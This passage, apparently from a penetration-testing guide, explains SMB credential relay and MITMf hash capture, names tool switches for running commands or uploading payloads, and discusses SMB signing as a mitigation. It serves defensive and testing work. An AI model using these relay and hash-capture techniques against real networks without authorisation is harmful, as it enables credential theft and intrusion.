There are definitely other options which we can specify and are relevant on most penetration tests such as “-c” to execute commands, including empire payloads, or “-e” to upload and execute files such as a custom MSFPayload. In the event that we did not define either of these items, this tool with automatically attempt to execute against the target host.

Successful authentication and execution of

In many cases, this will be enough to get you started on the post exploitation phase of the penetration test, but in situations, where there are additional protections in place preventing this from being extremely useful, I recommend using the “-e” or “-c” switches.

There are certain situations in which this attack will be stopped. As mentioned in the introduction, Microsoft released a patch which stops users from relaying hashes back to the original host. If the user is only a local admin on their own host, this will not be too useful. The other situation is when SMB signing is enabled. This is the case by default on domain controllers and can be the case on other servers or workstations in the environment.

Relaying credentials to a domain controller with SMB signing enabled and failing.


As mentioned above, one mitigation to prevent the relay portion of this attack would be to enable SMB signing throughout the environment. I have heard various estimates for the overhead on network level traffic caused by this and if there is any concern about capping out bandwidth, clients should take a risk based approach to determine which systems should have SMB signing enabled.

SMB signing will only prevent the ability to relay credentials successfully and will not provide any protections around capturing password hashes. In the event that SMB signing is enabled, we would still be able to use the MITMf section of this guide to capture credentials and attempt to wordlist/hybrid attack the hash and hopefully recover the plaintext password of the hash. In this situation, I would recommend using a different browser other than Internet Explorer or Microsoft Edge. Both Chrome and Firefox can be configured to automatically send NTLM credentials to authenticate to an SMB server, but neither will do it by default. Per the research I have done, there is no way to disable this feature in IE or Edge, only for the entire Windows system (which breaks basically everything…).

There are other solutions to prevent ARP spoofing but, to me, this is more of a solution of a symptom than a root cause because attackers on the internal network can use other MITM attacker to attack clients and stopping ARP spoofing is no guaranteed protection against the damages of MITM attacks.